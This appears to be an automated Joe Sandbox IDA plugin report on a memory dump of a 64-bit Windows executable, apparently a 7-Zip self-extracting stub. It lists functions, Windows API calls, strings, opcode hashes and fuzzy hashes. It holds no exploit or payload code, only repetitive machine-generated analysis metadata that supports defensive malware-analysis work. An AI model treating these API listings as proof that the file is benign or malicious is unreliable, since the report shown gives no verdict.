Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Item$ClientMetricsSystem$Window$Screen$Rect$LongParent
String ID:
API String ID: 3236151763-0
Opcode ID: 4e6f5c853753a3134c549e3a9eaf14236156baa682c8ed6c7a59dc888e120e6d
Instruction ID: 8348584d0956bbbffa7648db67e91854ff55739536c96388f37e5c2a24ed157b
Opcode Fuzzy Hash: 4e6f5c853753a3134c549e3a9eaf14236156baa682c8ed6c7a59dc888e120e6d
Instruction Fuzzy Hash: CEC19CB66142418BD724DF6AF44479EBBA1F7CD784F104129EF8A83B68DB7DE8458B00

Function 000000014001F68C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 130
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 000000014001F6A9
Sleep.KERNEL32 ref: 000000014001F6DD
_amsg_exit.MSVCRT ref: 000000014001F6F3
_initterm.MSVCRT ref: 000000014001F778
exit.MSVCRT ref: 000000014001F82B
_cexit.MSVCRT ref: 000000014001F83A
_ismbblead.MSVCRT ref: 000000014001F85D

Strings

MZ`, xrefs: 000000014001F80E

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: InfoSleepStartup_amsg_exit_cexit_initterm_ismbbleadexit
String ID: MZ`
API String ID: 4226152999-2330268423
Opcode ID: 64dae940a6cafae03685ce600b355dccff89d17899c6c895487bbbc6450da032
Instruction ID: c66a68b562d0c52db21e98d4b175da4e710ecd27ba04559c35a55d4fd9d277bd
Opcode Fuzzy Hash: 64dae940a6cafae03685ce600b355dccff89d17899c6c895487bbbc6450da032
Instruction Fuzzy Hash: E25137326087418AF7638B22E9847E976A4F79C7D4F544029FB4A8B6F5DB3EC894D700

Function 0000000140006368 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 000000014000637F

Part of subcall function 0000000140002730: GetUserDefaultUILanguage.KERNELBASE(?,?,?,?,00000001400028D4), ref: 0000000140002740

Part of subcall function 00000001400027A0: GetLastError.KERNEL32 ref: 0000000140002807
Part of subcall function 00000001400027A0: wsprintfW.USER32 ref: 000000014000281E
Part of subcall function 00000001400027A0: GetEnvironmentVariableW.KERNEL32 ref: 000000014000282E
Part of subcall function 00000001400027A0: GetLastError.KERNEL32 ref: 0000000140002836
Part of subcall function 00000001400027A0: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002855
Part of subcall function 00000001400027A0: GetEnvironmentVariableW.KERNEL32 ref: 0000000140002869
Part of subcall function 00000001400027A0: GetLastError.KERNEL32 ref: 0000000140002873
Part of subcall function 00000001400027A0: lstrcmpiW.KERNEL32 ref: 000000014000288A
Part of subcall function 00000001400027A0: ??3@YAXPEAX@Z.MSVCRT ref: 0000000140002899
Part of subcall function 00000001400027A0: SetLastError.KERNEL32 ref: 00000001400028AF
Part of subcall function 00000001400027A0: lstrlenA.KERNEL32 ref: 00000001400028E4
Part of subcall function 00000001400027A0: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002901
Part of subcall function 00000001400027A0: GetLocaleInfoW.KERNEL32 ref: 0000000140002937
Part of subcall function 00000001400027A0: _wtol.MSVCRT ref: 0000000140002949
Part of subcall function 00000001400027A0: MultiByteToWideChar.KERNEL32 ref: 0000000140002979

SHGetSpecialFolderPathW.SHELL32 ref: 0000000140006428
wsprintfW.USER32 ref: 0000000140006445

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

??2@YAPEAX_K@Z.MSVCRT ref: 00000001400064AF
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140006527
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006579
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006583

Strings

7zSfxFolder%02d, xrefs: 0000000140006436

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??2@$??3@ErrorLast$EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: 7zSfxFolder%02d
API String ID: 3593046394-2820892521
Opcode ID: 346e1575df3d3e1ec67df042477625ee05366d7f474db4da1a58911701c8eb0c
Instruction ID: d86841789fdcc1852a20617a9d7e1424b9201dffb0f1e542e4f0a725028d934a
Opcode Fuzzy Hash: 346e1575df3d3e1ec67df042477625ee05366d7f474db4da1a58911701c8eb0c
Instruction Fuzzy Hash: 4C513BB2615A4082FB12EB22F8557D96366F78C7D5F904529FB4D07ABADF38C904CB40

Function 0000000140002118 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 42
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140002123
CreateWindowExW.USER32 ref: 000000014000216D
SetTimer.USER32 ref: 0000000140002188
GetMessageW.USER32 ref: 000000014000219B
DispatchMessageW.USER32 ref: 00000001400021A6
KillTimer.USER32 ref: 00000001400021B4
DestroyWindow.USER32 ref: 00000001400021BD

Strings

Static, xrefs: 000000014000214C

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: MessageTimerWindow$CreateDestroyDispatchHandleKillModule
String ID: Static
API String ID: 1156981321-2272013587
Opcode ID: 4def929598b39bd733724bb09f5a6ff4e7b17700c7379cf9330da86517aae6d6
Instruction ID: 4b9457724f161a57c401fd14340ddc3d744f683f53298b62602d5d74445e60c2
Opcode Fuzzy Hash: 4def929598b39bd733724bb09f5a6ff4e7b17700c7379cf9330da86517aae6d6
Instruction Fuzzy Hash: 7F115E71614B8083E711CBB5F8557EA77A0F7DC784F400229AB4A87AA4DF3CC4488B00

Function 0000000140009FC0 Relevance: 12.1, APIs: 8, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32 ref: 0000000140009FEE
GetSystemMetrics.USER32 ref: 000000014000A003
GetSystemMetrics.USER32 ref: 000000014000A013
GetSystemMetrics.USER32 ref: 000000014000A01F
SelectObject.GDI32 ref: 000000014000A03A
DrawTextW.USER32 ref: 000000014000A05F
SelectObject.GDI32 ref: 000000014000A083
ReleaseDC.USER32 ref: 000000014000A091

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 4206e7a3e9d1913623ca566ab4f36691769513c5b6083dee215e1b73967a417d
Instruction ID: 40fb2d017464c156155d3dfe065c4dc365d96e56848652a51c7dfb2d0fc5abc1
Opcode Fuzzy Hash: 4206e7a3e9d1913623ca566ab4f36691769513c5b6083dee215e1b73967a417d
Instruction Fuzzy Hash: 3D216D76604A949BD705DF63E84478AB760F798BD8F408518EF5A43B64CF38E4A6CB00

Function 000000014000A63C Relevance: 12.1, APIs: 8, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 000000014000A66B
SystemParametersInfoW.USER32 ref: 000000014000A68B
GetDC.USER32 ref: 000000014000A697
GetDeviceCaps.GDI32 ref: 000000014000A6A8
MulDiv.KERNEL32 ref: 000000014000A6BD
ReleaseDC.USER32 ref: 000000014000A6CC
GetModuleHandleW.KERNEL32 ref: 000000014000A6F1
DialogBoxIndirectParamW.USER32 ref: 000000014000A733

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
String ID:
API String ID: 2693764856-0
Opcode ID: 26fabf489a1ef6bcd509b6eb77f1ff65f28faa688a1408529bff874025cbf77a
Instruction ID: b9517a37f92d20582659d71d18bd2e741eaf10e01a778314a6a8e95dcbfff312
Opcode Fuzzy Hash: 26fabf489a1ef6bcd509b6eb77f1ff65f28faa688a1408529bff874025cbf77a
Instruction Fuzzy Hash: FB31827520578186E766DB62F4147DAB3A0F79CBD0F444129EB8A43B64DF7CC545CB00

Function 0000000140005074 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002B70: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002B8D
Part of subcall function 0000000140002B70: ??3@YAXPEAX@Z.MSVCRT ref: 0000000140002BBF

Part of subcall function 0000000140004E38: ??3@YAXPEAX@Z.MSVCRT ref: 0000000140004F5E

Part of subcall function 00000001400034B0: lstrlenA.KERNEL32 ref: 0000000140003502
Part of subcall function 00000001400034B0: lstrlenA.KERNEL32 ref: 000000014000350E
Part of subcall function 00000001400034B0: memcmp.MSVCRT ref: 0000000140003586
Part of subcall function 00000001400034B0: memcmp.MSVCRT ref: 00000001400035C3
Part of subcall function 00000001400034B0: memcpy.MSVCRT ref: 00000001400035ED

??3@YAXPEAX@Z.MSVCRT ref: 000000014000529B
??3@YAXPEAX@Z.MSVCRT ref: 00000001400052A5
??3@YAXPEAX@Z.MSVCRT ref: 00000001400052AF

Strings

x64, xrefs: 00000001400050A5
amd64, xrefs: 0000000140005097

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$lstrlenmemcmp$??2@memcpy
String ID: amd64$x64
API String ID: 2116704905-3265184354
Opcode ID: dc7cb85b40b12feb772f5ea38b5e3ccb6ebf715c13dcc451150c46cbe1c7a466
Instruction ID: e1e9cdc367da93d0c860c32fb7537c4a99d3299c5fbbe69dbd3d8d10b43e4673
Opcode Fuzzy Hash: dc7cb85b40b12feb772f5ea38b5e3ccb6ebf715c13dcc451150c46cbe1c7a466
Instruction Fuzzy Hash: 7E614976218A8596DB12EF22E4403DAB3B5F78D7C8F945026FB8917769CF39C906CB40

Function 0000000140001000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfW.USER32 ref: 000000014000106B
wsprintfW.USER32 ref: 0000000140001089
lstrcatW.KERNEL32 ref: 000000014000109C
ExitProcess.KERNEL32 ref: 00000001400010C5

Strings

0x%p, xrefs: 000000014000107D

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: wsprintf$ExitProcesslstrcat
String ID: 0x%p
API String ID: 2530384128-1745605757
Opcode ID: 19cd34f0a533aafb2d197500bf6eb3d135093424969f0e8b536446425ef47901
Instruction ID: acc37192b4180f8edc1e7423af0c814a1dc50cd8e32be561646255b37a72992f
Opcode Fuzzy Hash: 19cd34f0a533aafb2d197500bf6eb3d135093424969f0e8b536446425ef47901
Instruction Fuzzy Hash: 85214776604A8296EA22DF62F8907C923A1F7DC7C0F80412AEB8D436A5DF78C995C740

Function 00000001400034B0 Relevance: 6.4, APIs: 5, Instructions: 116
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32 ref: 0000000140003502
lstrlenA.KERNEL32 ref: 000000014000350E
memcmp.MSVCRT ref: 0000000140003586
memcmp.MSVCRT ref: 00000001400035C3
memcpy.MSVCRT ref: 00000001400035ED

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: lstrlenmemcmp$memcpy
String ID:
API String ID: 4028117624-0
Opcode ID: 881938441dd166818063c08505795d51be164eb9d713f433d9f99ef1e321ac14
Instruction ID: bb44bf155945f8d6f34932f9ce24bbc9304702f5a66cef83cbbbee2e70d880ab
Opcode Fuzzy Hash: 881938441dd166818063c08505795d51be164eb9d713f433d9f99ef1e321ac14
Instruction Fuzzy Hash: 7841C5B371458092D722DF5BF8447DEA695B39CBC4F588026FF8983B64EA79C989C700

Function 0000000140009E30 Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemParametersInfoW.USER32 ref: 0000000140009E6A
GetSystemMetrics.USER32 ref: 0000000140009E8E
CreateFontIndirectW.GDI32 ref: 0000000140009E9B
DeleteObject.GDI32 ref: 0000000140009ED7

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 97b607c756a1c54a1dd479288cac96d42e9ce5d4143aa50fdb25c6ee00870b4f
Instruction ID: e267296afe67887ce3ec2b2f2b6ae7c4e753fcb0ca15295eefdac00a7c053f0d
Opcode Fuzzy Hash: 97b607c756a1c54a1dd479288cac96d42e9ce5d4143aa50fdb25c6ee00870b4f
Instruction Fuzzy Hash: 43215872204A819BD311CF42F888BDAB361F798BC4F554126FF5A43BA8DB38D985CB00

Function 000000014000585C Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140003D18: GetWindowTextLengthW.USER32 ref: 0000000140003D4B
Part of subcall function 0000000140003D18: GetWindowTextW.USER32 ref: 0000000140003D73

??3@YAXPEAX@Z.MSVCRT ref: 00000001400058B7
??3@YAXPEAX@Z.MSVCRT ref: 00000001400058C1
SetWindowTextW.USER32 ref: 00000001400058CE
??3@YAXPEAX@Z.MSVCRT ref: 00000001400058DB

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@TextWindow$Length
String ID:
API String ID: 2308334395-0
Opcode ID: 5bb13551ee4accaa661b1caaa54c1d28fd1ca95166b1327092facfeaeeeb78d9
Instruction ID: 6ba6d3db72f77dec7bb65fc3950b8e1d26046cadfe83edb426c1c540d51eaf2d
Opcode Fuzzy Hash: 5bb13551ee4accaa661b1caaa54c1d28fd1ca95166b1327092facfeaeeeb78d9
Instruction Fuzzy Hash: 8301EC7222494992DE12EB52F4513EAA321FBD97C4F905122F78D4767ADE3CCA09CB00

Function 000000014000AB64 Relevance: 4.6, APIs: 3, Instructions: 59COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 000000014000AB93
GetSystemMetrics.USER32 ref: 000000014000AB9F
GetDlgItem.USER32 ref: 000000014000ABFF

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: MetricsSystem$Item
String ID:
API String ID: 56695849-0
Opcode ID: a040629c6100af4c50eae1f3d672cc5fca0d75be94414af8d4edd9412cc7a44c
Instruction ID: 4a3ee8f57d2fba9540499de171231a1ee7a3cb3d0247ab43bed433d0316f880c
Opcode Fuzzy Hash: a040629c6100af4c50eae1f3d672cc5fca0d75be94414af8d4edd9412cc7a44c
Instruction Fuzzy Hash: F4217173500655CBDB50CF66E40029EB7B0F788F99F158116EB8913728DB78E946CF80

Function 0000000140009BC0 Relevance: 4.5, APIs: 3, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 0000000140009BE9
SetWindowLongPtrW.USER32 ref: 0000000140009C0B
SendMessageW.USER32 ref: 0000000140009C22

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 7db93ef1b9720d41535e79d9563aba36c55eede9a9ab1c2f874995bd30859416
Instruction ID: c9c9ddbc639c1b51baff4819c68466cc280cea20fdf69b61889efa159f58aed6
Opcode Fuzzy Hash: 7db93ef1b9720d41535e79d9563aba36c55eede9a9ab1c2f874995bd30859416
Instruction Fuzzy Hash: 7E015736610B948AE7548F53A880B9D77A1E79DFC0F588429EF4A03B64CB38E991C740

Function 000000014000C698 Relevance: 4.5, APIs: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 000000014000AEC0: GetSystemMetrics.USER32 ref: 000000014000AF22
Part of subcall function 000000014000AEC0: GetSystemMetrics.USER32 ref: 000000014000AF38

IsWindow.USER32 ref: 000000014000C6D5
IsBadReadPtr.KERNEL32 ref: 000000014000C6EB
??3@YAXPEAX@Z.MSVCRT ref: 000000014000C73D

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: MetricsSystem$??3@ReadWindow
String ID:
API String ID: 337618803-0
Opcode ID: 497850246290ed38c37119841aed6482982bf5f918e31e0164e8fde76b4d8e76
Instruction ID: 80329869c1f7ac6ded373c5337ce0c0f455f784db5b649e745c2e1829cc0d4df
Opcode Fuzzy Hash: 497850246290ed38c37119841aed6482982bf5f918e31e0164e8fde76b4d8e76
Instruction Fuzzy Hash: 1E1135B0625A8581EB52DB62F881BE523A0ABDD7C4F904419FB8D472B1DF3CC9898750

Function 0000000140009F08 Relevance: 4.5, APIs: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0000000140009F15
GetWindowRect.USER32 ref: 0000000140009F29
SetWindowPos.USER32 ref: 0000000140009F75

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Window$ParentRect
String ID:
API String ID: 4286822721-0
Opcode ID: affc3d924cbb22dbc8a8eb6dcc758eac178c594c13a1fc9b1d19a5378a6d4425
Instruction ID: 25a249254e8626257cc3941788dbc5eada97b48c2c5fa8906ab10203577a698d
Opcode Fuzzy Hash: affc3d924cbb22dbc8a8eb6dcc758eac178c594c13a1fc9b1d19a5378a6d4425
Instruction Fuzzy Hash: 5301FB72224941CBE711CF7AE848B5AB7B1F3DCB9AF184118EB4987668CF3DD8458B00

Function 0000000140002730 Relevance: 4.5, APIs: 3, Instructions: 26COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE(?,?,?,?,00000001400028D4), ref: 0000000140002740
GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,00000001400028D4), ref: 0000000140002760
GetSystemDefaultLCID.KERNEL32(?,?,?,?,00000001400028D4), ref: 000000014000276C

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Default$LanguageSystem$User
String ID:
API String ID: 3651142734-0
Opcode ID: aeda2a999ae0fd85cb3ab0dfde365f297e0d8b7c737a0b1af27e0b6d0465526c
Instruction ID: 190b127eaf96d4dd4e8ea8473f1168bc35628f62c0060ec639a7b95baad9ce91
Opcode Fuzzy Hash: aeda2a999ae0fd85cb3ab0dfde365f297e0d8b7c737a0b1af27e0b6d0465526c
Instruction Fuzzy Hash: 46F05878109126C6F227AB93A9447F422A2E77CBD1FC0005AF78A832B4EB3C08959321

Function 000000014000AF54 Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,000000014000C729), ref: 000000014000AFCE
??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,000000014000C729), ref: 000000014000AFD8

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 3aac621b68b07f3b57dba174d9674d7cc9cd50848231fc572d3e25ff1deff6f7
Instruction ID: 9a1577d38859e20e451d6d5e431b402394783ca76725f78b20535ee69fd3f8d0
Opcode Fuzzy Hash: 3aac621b68b07f3b57dba174d9674d7cc9cd50848231fc572d3e25ff1deff6f7
Instruction Fuzzy Hash: FB113C72215B8492DA51DB52F1507AEA3A0FB9CBD0F444121FF8E47B6ADF3CCA118B00

Function 0000000140009C5C Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32 ref: 0000000140009CA6
UnhookWindowsHookEx.USER32 ref: 0000000140009CC0

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
